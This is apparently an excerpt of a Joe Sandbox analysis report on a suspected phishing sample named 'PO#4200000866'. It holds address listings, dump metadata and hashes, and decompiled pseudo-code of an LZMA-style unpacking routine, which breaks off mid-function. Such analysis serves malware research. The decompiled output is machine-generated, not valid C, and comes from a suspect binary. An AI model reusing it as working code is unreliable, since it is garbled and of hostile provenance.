                                                                                      0x0040729d
                                                                                      0x004072a3
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407395
                                                                                      0x00407399
                                                                                      0x004073bb
                                                                                      0x004073be
                                                                                      0x004073c8
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x0040739b
                                                                                      0x0040739e
                                                                                      0x004073a2
                                                                                      0x004073a5
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407452
                                                                                      0x00407456
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x0040747b
                                                                                      0x00407482
                                                                                      0x00407489
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00407458
                                                                                      0x0040745b
                                                                                      0x0040745e
                                                                                      0x00407461
                                                                                      0x00407468
                                                                                      0x004073ac
                                                                                      0x004073ac
                                                                                      0x004073af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407543
                                                                                      0x00407546
                                                                                      0x00407447
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040717d
                                                                                      0x0040717f
                                                                                      0x00407186
                                                                                      0x00407187
                                                                                      0x00407189
                                                                                      0x0040718c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407194
                                                                                      0x00407197
                                                                                      0x0040719a
                                                                                      0x0040719c
                                                                                      0x0040719e
                                                                                      0x0040719e
                                                                                      0x0040719f
                                                                                      0x004071a2
                                                                                      0x004071a9
                                                                                      0x004071ac
                                                                                      0x004071ba
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407490
                                                                                      0x00407490
                                                                                      0x00407493
                                                                                      0x0040749a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040749f
                                                                                      0x0040749f
                                                                                      0x004074a3
                                                                                      0x004075db
                                                                                      0x00000000
                                                                                      0x004075db
                                                                                      0x004074a9
                                                                                      0x004074ac
                                                                                      0x004074af
                                                                                      0x004074b3
                                                                                      0x004074b6
                                                                                      0x004074bc
                                                                                      0x004074be
                                                                                      0x004074be
                                                                                      0x004074be
                                                                                      0x004074c1
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c7
                                                                                      0x004074c7
                                                                                      0x004074cb
                                                                                      0x0040752b
                                                                                      0x0040752e
                                                                                      0x00407533
                                                                                      0x00407534
                                                                                      0x00407536
                                                                                      0x00407538
                                                                                      0x0040753b
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00000000
                                                                                      0x0040744d
                                                                                      0x00407447
                                                                                      0x004074cd
                                                                                      0x004074d3
                                                                                      0x004074d6
                                                                                      0x004074d9
                                                                                      0x004074dc
                                                                                      0x004074df
                                                                                      0x004074e2
                                                                                      0x004074e5
                                                                                      0x004074e8
                                                                                      0x004074eb
                                                                                      0x004074ee
                                                                                      0x00407507
                                                                                      0x0040750a
                                                                                      0x0040750d
                                                                                      0x00407510
                                                                                      0x00407514
                                                                                      0x00407516
                                                                                      0x00407516
                                                                                      0x00407517
                                                                                      0x0040751a
                                                                                      0x004074f0
                                                                                      0x004074f0
                                                                                      0x004074f8
                                                                                      0x004074fd
                                                                                      0x004074ff
                                                                                      0x00407502
                                                                                      0x00407502
                                                                                      0x0040751d
                                                                                      0x00407524
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00000000
                                                                                      0x004071c2
                                                                                      0x004071c5
                                                                                      0x004071fb
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732e
                                                                                      0x0040732e
                                                                                      0x00407331
                                                                                      0x00407333
                                                                                      0x004075bd
                                                                                      0x00000000
                                                                                      0x004075bd
                                                                                      0x00407339
                                                                                      0x0040733c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407342
                                                                                      0x00407346
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00000000
                                                                                      0x00407349
                                                                                      0x004071c7
                                                                                      0x004071c9
                                                                                      0x004071cb
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d1
                                                                                      0x004071d3
                                                                                      0x004071d5
                                                                                      0x004071d8
                                                                                      0x004071db
                                                                                      0x004071f1
                                                                                      0x004071f6
                                                                                      0x0040722e
                                                                                      0x0040722e
                                                                                      0x00407232
                                                                                      0x0040725e
                                                                                      0x00407260
                                                                                      0x00407267
                                                                                      0x0040726a
                                                                                      0x0040726d
                                                                                      0x0040726d
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407274
                                                                                      0x00407277
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x004072ae
                                                                                      0x004072ae
                                                                                      0x004072b1
                                                                                      0x004072b4
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00000000
                                                                                      0x00407328
                                                                                      0x004072b6
                                                                                      0x004072bc
                                                                                      0x004072bf
                                                                                      0x004072c2
                                                                                      0x004072c5
                                                                                      0x004072c8
                                                                                      0x004072cb
                                                                                      0x004072ce
                                                                                      0x004072d1
                                                                                      0x004072d4
                                                                                      0x004072d7
                                                                                      0x004072f0
                                                                                      0x004072f2
                                                                                      0x004072f5
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072fb
                                                                                      0x004072fe
                                                                                      0x00407300
                                                                                      0x00407302
                                                                                      0x00407305
                                                                                      0x00407307
                                                                                      0x0040730a
                                                                                      0x0040730e
                                                                                      0x00407310
                                                                                      0x00407310
                                                                                      0x00407311
                                                                                      0x00407314
                                                                                      0x00407317
                                                                                      0x004072d9
                                                                                      0x004072d9
                                                                                      0x004072e1
                                                                                      0x004072e6
                                                                                      0x004072e8
                                                                                      0x004072eb
                                                                                      0x004072eb
                                                                                      0x0040731a
                                                                                      0x00407321
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00407321
                                                                                      0x00407234
                                                                                      0x00407237
                                                                                      0x00407239
                                                                                      0x0040723c
                                                                                      0x0040723f
                                                                                      0x00407242
                                                                                      0x00407244
                                                                                      0x00407247
                                                                                      0x0040724a
                                                                                      0x0040724a
                                                                                      0x0040724d
                                                                                      0x0040724d
                                                                                      0x00407250
                                                                                      0x00407257
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00407257
                                                                                      0x004071dd
                                                                                      0x004071e0
                                                                                      0x004071e2
                                                                                      0x004071e5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f44
                                                                                      0x00406f44
                                                                                      0x00406f48
                                                                                      0x0040758d
                                                                                      0x00000000
                                                                                      0x0040758d
                                                                                      0x00406f4e
                                                                                      0x00406f51
                                                                                      0x00406f54
                                                                                      0x00406f57
                                                                                      0x00406f5a
                                                                                      0x00406f5d
                                                                                      0x00406f60
                                                                                      0x00406f62
                                                                                      0x00406f65
                                                                                      0x00406f68
                                                                                      0x00406f6b
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070cf
                                                                                      0x004070cf
                                                                                      0x004070d3
                                                                                      0x00407599
                                                                                      0x00000000
                                                                                      0x00407599
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070df
                                                                                      0x004070e2
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e4
                                                                                      0x004070e7
                                                                                      0x004070ea
                                                                                      0x004070ed
                                                                                      0x004070f0
                                                                                      0x004070f3
                                                                                      0x004070f6
                                                                                      0x004070f7
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070f9
                                                                                      0x004070fc
                                                                                      0x004070ff
                                                                                      0x00407102
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407105
                                                                                      0x00407108
                                                                                      0x0040710a
                                                                                      0x0040710a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x00407350
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407356
                                                                                      0x00407359
                                                                                      0x0040735c
                                                                                      0x0040735f
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407364
                                                                                      0x00407367
                                                                                      0x0040736a
                                                                                      0x0040736d
                                                                                      0x00407370
                                                                                      0x00407373
                                                                                      0x00407374
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407379
                                                                                      0x0040737c
                                                                                      0x0040737f
                                                                                      0x00407382
                                                                                      0x00407385
                                                                                      0x00407389
                                                                                      0x0040738b
                                                                                      0x0040738e
                                                                                      0x00000000
                                                                                      0x00407390
                                                                                      0x0040710d
                                                                                      0x0040710d
                                                                                      0x00000000
                                                                                      0x0040710d
                                                                                      0x0040738e
                                                                                      0x004075c3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bf2
                                                                                      0x004075fa
                                                                                      0x004075fa
                                                                                      0x00000000
                                                                                      0x004075fa
                                                                                      0x00407447
                                                                                      0x004073ce
                                                                                      0x004073cb
                                                                                      0x00000000
                                                                                      0x00407120

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                      • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                      • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                      • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E00407068() {
                                                                                      				unsigned short _t531;
                                                                                      				signed int _t532;
                                                                                      				void _t533;
                                                                                      				signed int _t534;
                                                                                      				signed int _t535;
                                                                                      				signed int _t565;
                                                                                      				signed int _t568;
                                                                                      				signed int _t589;
                                                                                      				signed int* _t606;
                                                                                      				void* _t613;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                      						 *(_t613 - 0x84) = 0xa;
                                                                                      						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                      					} else {
                                                                                      						 *(__ebp - 0x84) = 9;
                                                                                      						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      					}
                                                                                      					while(1) {
                                                                                      						 *(_t613 - 0x54) = _t606;
                                                                                      						while(1) {
                                                                                      							L133:
                                                                                      							_t531 =  *_t606;
                                                                                      							_t589 = _t531 & 0x0000ffff;
                                                                                      							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                      							if( *(_t613 - 0xc) >= _t565) {
                                                                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                      								 *(_t613 - 0x40) = 1;
                                                                                      								_t532 = _t531 - (_t531 >> 5);
                                                                                      								 *_t606 = _t532;
                                                                                      							} else {
                                                                                      								 *(_t613 - 0x10) = _t565;
                                                                                      								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                      							}
                                                                                      							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                      								goto L139;
                                                                                      							}
                                                                                      							L137:
                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                      								 *(_t613 - 0x88) = 5;
                                                                                      								L170:
                                                                                      								_t568 = 0x22;
                                                                                      								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                      								_t535 = 0;
                                                                                      								L172:
                                                                                      								return _t535;
                                                                                      							}
                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      							L139:
                                                                                      							_t533 =  *(_t613 - 0x84);
                                                                                      							while(1) {
                                                                                      								 *(_t613 - 0x88) = _t533;
                                                                                      								while(1) {
                                                                                      									L1:
                                                                                      									_t534 =  *(_t613 - 0x88);
                                                                                      									if(_t534 > 0x1c) {
                                                                                      										break;
                                                                                      									}
                                                                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                      										case 0:
                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      											_t534 =  *( *(_t613 - 0x70));
                                                                                      											if(_t534 > 0xe1) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											_t538 = _t534 & 0x000000ff;
                                                                                      											_push(0x2d);
                                                                                      											asm("cdq");
                                                                                      											_pop(_t570);
                                                                                      											_push(9);
                                                                                      											_pop(_t571);
                                                                                      											_t609 = _t538 / _t570;
                                                                                      											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                      											asm("cdq");
                                                                                      											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                      											 *(_t613 - 0x3c) = _t604;
                                                                                      											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                      											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                      											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                      											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                      												L10:
                                                                                      												if(_t612 == 0) {
                                                                                      													L12:
                                                                                      													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      													goto L15;
                                                                                      												} else {
                                                                                      													goto L11;
                                                                                      												}
                                                                                      												do {
                                                                                      													L11:
                                                                                      													_t612 = _t612 - 1;
                                                                                      													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                      												} while (_t612 != 0);
                                                                                      												goto L12;
                                                                                      											}
                                                                                      											if( *(_t613 - 4) != 0) {
                                                                                      												GlobalFree( *(_t613 - 4));
                                                                                      											}
                                                                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      											 *(_t613 - 4) = _t534;
                                                                                      											if(_t534 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                      												goto L10;
                                                                                      											}
                                                                                      										case 1:
                                                                                      											L13:
                                                                                      											__eflags =  *(_t613 - 0x6c);
                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                      												 *(_t613 - 0x88) = 1;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      											_t45 = _t613 - 0x48;
                                                                                      											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                      											__eflags =  *_t45;
                                                                                      											L15:
                                                                                      											if( *(_t613 - 0x48) < 4) {
                                                                                      												goto L13;
                                                                                      											}
                                                                                      											_t546 =  *(_t613 - 0x40);
                                                                                      											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                      												L20:
                                                                                      												 *(_t613 - 0x48) = 5;
                                                                                      												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                      												goto L23;
                                                                                      											}
                                                                                      											 *(_t613 - 0x74) = _t546;
                                                                                      											if( *(_t613 - 8) != 0) {
                                                                                      												GlobalFree( *(_t613 - 8));
                                                                                      											}
                                                                                      											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                      											 *(_t613 - 8) = _t534;
                                                                                      											if(_t534 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												goto L20;
                                                                                      											}
                                                                                      										case 2:
                                                                                      											L24:
                                                                                      											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                      											 *(_t613 - 0x84) = 6;
                                                                                      											 *(_t613 - 0x4c) = _t553;
                                                                                      											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                      											 *(_t613 - 0x54) = _t606;
                                                                                      											goto L133;
                                                                                      										case 3:
                                                                                      											L21:
                                                                                      											__eflags =  *(_t613 - 0x6c);
                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                      												 *(_t613 - 0x88) = 3;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      											_t67 = _t613 - 0x70;
                                                                                      											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                      											__eflags =  *_t67;
                                                                                      											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      											L23:
                                                                                      											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                      											if( *(_t613 - 0x48) != 0) {
                                                                                      												goto L21;
                                                                                      											}
                                                                                      											goto L24;
                                                                                      										case 4:
                                                                                      											L133:
                                                                                      											_t531 =  *_t606;
                                                                                      											_t589 = _t531 & 0x0000ffff;
                                                                                      											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                      											if( *(_t613 - 0xc) >= _t565) {
                                                                                      												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                      												 *(_t613 - 0x40) = 1;
                                                                                      												_t532 = _t531 - (_t531 >> 5);
                                                                                      												 *_t606 = _t532;
                                                                                      											} else {
                                                                                      												 *(_t613 - 0x10) = _t565;
                                                                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                      											}
                                                                                      											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                      												goto L139;
                                                                                      											}
                                                                                      										case 5:
                                                                                      											goto L137;
                                                                                      										case 6:
                                                                                      											__edx = 0;
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      												while(1) {
                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                      											__cl = 8;
                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      											__ecx =  *(__ebp - 4);
                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                      													_t98 = __ebp - 0x38;
                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      													__eflags =  *_t98;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      												}
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												goto L61;
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 8);
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												goto L41;
                                                                                      											}
                                                                                      										case 7:
                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      												__al = __al & 0x000000fd;
                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                      												__eflags = __eax;
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												goto L69;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      											while(1) {
                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                      												goto L133;
                                                                                      											}
                                                                                      										case 8:
                                                                                      											goto L0;
                                                                                      										case 9:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												goto L89;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											__eax = 0;
                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                      											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      											__eflags = _t258;
                                                                                      											0 | _t258 = _t258 + _t258 + 9;
                                                                                      											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                      											goto L75;
                                                                                      										case 0xa:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      												while(1) {
                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                      											goto L88;
                                                                                      										case 0xb:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      											L88:
                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      											L89:
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      											goto L69;
                                                                                      										case 0xc:
                                                                                      											L99:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t334 = __ebp - 0x70;
                                                                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t334;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                      											goto L101;
                                                                                      										case 0xd:
                                                                                      											L37:
